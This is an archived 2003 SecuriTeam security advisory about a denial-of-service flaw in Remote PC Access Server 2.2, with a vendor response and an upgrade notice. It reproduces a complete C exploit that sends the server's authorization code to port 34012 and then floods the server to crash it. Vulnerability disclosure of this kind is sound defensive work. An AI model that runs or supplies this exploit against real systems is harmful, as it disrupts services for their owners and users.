[NT] Remote PC Access Server DoS Attack Vulnerability

• Previous message: SecuriTeam: "[NEWS] Axis Network Camera HTTP Authentication Bypass"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 30 May 2003 00:05:58 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

In the US?

Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!

Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -

  Remote PC Access Server DoS Attack Vulnerability
------------------------------------------------------------------------

SUMMARY

Remote PC Access is "fast, compact software for accessing and controlling
any computer from any computer on the Internet or on local area networks
(LAN). View the remote PC's screen, control its keyboard, and mouse just
as if you were sitting in front of it. The software transparently works
through firewalls and routers, and has support for dynamic IP addresses.
There is also an option to connect to a remote computer by its nickname
instead of its IP address". A vulnerability in the product allows
attackers to cause the product to stop responding by sending it malformed
packets.

DETAILS

Vulnerable systems:
 * Remote PC Access Server version 2.2

Immune systems:
 * Remote PC Access Server version 3.1

How the vulnerability can be exploited?
Remote PC Access Server using authorization code, in order to verify if
Remote PC Access Client has been connected to the local server. The
authorization code is 12 bytes long filled with the next bytes order:

Authorization Code (Hex): 27 00 00 00 04 00 00 00 00 00 00 00 = 12 Bytes

The attacker can build a spoofed client program and use DoS attack, in
order to crash the remote server or remote system. If a local client sends
authorization code to remote server, the remote server sends
acknowledgment code back to the local client, after this process, by
sending any types of packets you can cause the local client to overflow
the remote server.

Solution:
A new version of Remote PC Access Server (version 3.1) has been released:
<http://www.access-remote-pc.com/download/rpcsetup.exe>
http://www.access-remote-pc.com/download/rpcsetup.exe

Vendor Response:
"Your report suggests that the server part of our software can be crashed
by abusing the communication protocol employed between client and server
(namely DoS attack). We are aware of this problem and it affects only a
few places inside the source code. We are releasing a new version in a
week or two which doesn't have this security vulnerability." (Sergey
Stoma)

Exploit:
/*****************************************************************************
------------------------------------------------------------------------------
 Remote PC Server Version 2.2 - Vulnerability Check (Source Version)
 Copyright (c) 2003 Yaron Tal. All Rights Reserved.
------------------------------------------------------------------------------
** Overview
******************************************************************

    Remote PC Access Server using authorization code, in order to verify
    if Remote PC Access Client has been connected to the local server.
    The authorization code is 12 bytes long filled with the next bytes
order:

    Authorization Code (Hex): 27 00 00 00 04 00 00 00 00 00 00 00 = 12
Bytes

    The attacker can build a spoofed client program and use DoS attack,
    in order to crash the remote server or remote system. If a local
client
    sends authorization code to remote server, the remote server sends
    acknowledgment code back to the local client, after this process,
    by sending any types of packets, the local client
    overflows the remote server.

** Terms OF Services
*********************************************************

You may not use, copy, modify, decompile, disassemble, emulate, clone
rent, lease, sell otherwise reverse engineer, or transfer this program or
any subset of this program, any such unauthorized use shall result
immediate and automatic termination of this license and may result in
criminal and/or civil prosecution.

Yaron Tal is not responsible for any special, incidental, indirect or
consequential damages that may happen when you use this program. This
program can crash remote server or system.

*****************************************************************************
    - Website: www.ytech.co.il \ Email: yarontal@ytech.co.il
    - Copyright (C) 2003 Yaron Tal. All Rights Reserved.
*****************************************************************************/

#include <stdio.h>
#include <conio.h>
#include <string.h>
#include <winsock.h>

#define WVERSION MAKEWORD(2,2)

void main(int argc, char *argv[])
{

    SOCKET wSocket;
    WSADATA wsaData;
    SOCKADDR_IN wAddress;
    char Ch = 0, Msg[256];

    unsigned char Packet[] = "\x27\x00\x00\x00" //
                             "\x04\x00\x00\x00" // Authorization Code
                             "\x00\x00\x00"; //

    printf("\nRemote PC Server Version 2.2 - Vulnerability Check (Source
Version)\n");
    printf("Copyright (C) 2003 Yaron Tal. All Rights Reserved.\n\n");
    printf("Usage: <%s> <Remote IP Address>\n",argv[0]);

    if (argc < 2) exit(1);

    if (WSAStartup(WVERSION, &wsaData))
    {
        printf("- Error: WSAStartup.\n (%d)", GetLastError());
        exit(1);
    }

    memset(&wAddress, 0, sizeof(wAddress));
    wSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    wAddress.sin_family = AF_INET;
    wAddress.sin_addr.s_addr = inet_addr(argv[1]);
    wAddress.sin_port = htons(34012);

    if (wSocket == INVALID_SOCKET)
    {
        printf("Error: socket() (%d)\n", GetLastError());
        exit(1);
    }

    if (connect(wSocket,(LPSOCKADDR)&wAddress,sizeof(struct sockaddr)) ==
SOCKET_ERROR)
    {
        printf("Error: listen() (%d)\n", GetLastError());
        exit(1);
    }

    printf("Connected To Remote Host...\n");
    printf("Sending Data...\n\n");

    if (send(wSocket, Packet, sizeof(Packet),0) == SOCKET_ERROR)
    {
        printf("- Error: send() (%d)\n", GetLastError());
        exit(1);
    }

    printf("Press ESC to disconnect and exit program.");
  
    while (Ch !=27)
    {

        if (kbhit()) Ch = getch();

        memset(Msg, 0, sizeof(Msg));
        if (recv(wSocket, Msg, strlen(Msg),0) == SOCKET_ERROR)
        {
            printf("Error: recv() (%d)\n", GetLastError());
            exit(1);
        }

        if (send(wSocket, Msg, sizeof(Msg),0) == SOCKET_ERROR)
        {
            printf("- Error: send() (%d)\n", GetLastError());
            exit(1);
        }

    }

    closesocket(wSocket);
    WSACleanup();

}

ADDITIONAL INFORMATION

The information has been provided by <mailto:yarontal@ytech.co.il> Yaron
Tal.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NEWS] Axis Network Camera HTTP Authentication Bypass"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]